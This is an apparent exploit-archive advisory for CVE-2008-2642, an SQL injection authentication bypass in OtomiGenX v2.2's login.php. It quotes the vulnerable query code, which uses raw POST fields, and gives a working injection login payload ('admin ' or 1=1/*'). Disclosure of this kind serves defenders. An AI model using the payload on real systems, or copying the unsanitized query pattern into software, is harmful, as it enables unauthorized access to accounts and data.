OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability

2008.06.03

Credit: hadihadi

Risk: Medium

Local: No

Remote: Yes

CVE: CVE-2008-2642

CWE: CWE-89

CVSS Base Score: 7.5/10

Impact Subscore: 6.4/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Partial

Integrity impact: Partial

Availability impact: Partial

  
 ######################################################################################
 #                                                                                    #
 #  ...::::: OtomiGenX v2.2 Ultimate  Authentication bypass Vulnerabilities ::::....  #           
 ######################################################################################

Virangar Security Team

www.virangar.net
www.virangar.ir
--------
Discoverd By :virangar security team(hadihadi)

special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra

& all virangar members & all hackerz

greetz:to my best friend in the world hadi_aryaie2004
& my lovely friend arash(imm02tal) 
----------------
                                .::::admin Authentication bypass vuln::::.
//vuln code in login.php:
...
..
...
line 29:

$passwd = md5($_POST[userPassword]);  // md5 hash password

if($_POST[userType] != 'Staff')
{$sql	  = "SELECT userID, userName 
             FROM user_account 
             WHERE userAccount='$_POST[userAccount]' AND 
                     userPassword='$passwd' AND 
                     userType='$_POST[userType]' AND isApproved='1'";

}else
$sql	  = "SELECT staffID, staffName, staffGroupID 
             FROM staff 
             WHERE staffAccount='$_POST[userAccount]' AND 
                     staffPassword='$passwd'";
...


-----
Exploit:
User Name:admin ' or 1=1/*
Password :[whatever]
usertype:staff
--------------

References:

http://xforce.iss.net/xforce/xfdb/42795

http://www.securityfocus.com/archive/1/archive/1/492914/100/0/threaded

http://secunia.com/advisories/30504

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

OtomiGenX v2.2 Ultimate Authentication bypass Vulnerability

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.